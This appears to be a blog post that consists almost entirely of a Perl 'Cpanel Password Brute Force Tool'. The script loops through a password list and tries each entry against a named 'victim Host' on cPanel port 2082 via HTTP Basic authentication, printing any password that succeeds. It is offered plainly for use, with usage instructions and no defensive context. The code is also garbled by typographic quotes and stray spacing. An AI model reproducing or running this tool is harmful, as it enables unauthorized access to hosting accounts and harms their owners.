Cpanel Brute Force Exploit

Script Perl Dilindedir

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# —————————-
# (c)jos_ali_joe
# Perl Version ( low speed )
# Oerginal Advisory :
use IO :: Socket ;
use LWP :: Simple ;
use MIME :: Base64 ;

$host = $ARGV [ 0 ];
$user = $ARGV [ 1 ];
$port = $ARGV [ 2 ];
$list = $ARGV [ 3 ];
$file = $ARGV [ 4 ];
$url = “http://” . $host . “:” . $port ;
if(@ ARGV < 3 ){
print q (
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#————————————————————-#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)jos_ali_joe / Indonesian Coder #
###############################################################
);exit;}

headx ();

$numstart = “-1″ ;

sub headx () {
print q (
###############################################################
# Cpanel Password Brute Force Tool #
# (c)jos_ali_joe / Indonesian Coder #
###############################################################
);
open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
@ PASSWORDS = < PASSFILE >;
close PASSFILE ;
foreach my $P (@ PASSWORDS ) {
chomp $P ;
$passwd = $P ;
print ”
[~] Try Password : $passwd
” ;
& brut ;
};
}
sub brut () {
$authx = encode_base64 ( $user . “:” . $passwd );
print $authx ;
my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
[-] Can not connect to the host” ;
print $sock “GET / HTTP/1.1
” ;
print $sock “Authorization: Basic $authx
” ;
print $sock “Connection: Close

” ;
read $sock , $answer , 128 ;
close ( $sock );

if ( $answer =~ / Moved /) {
print ”
[~] PASSWORD FOUND : $passwd
” ;
exit();
}
}

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s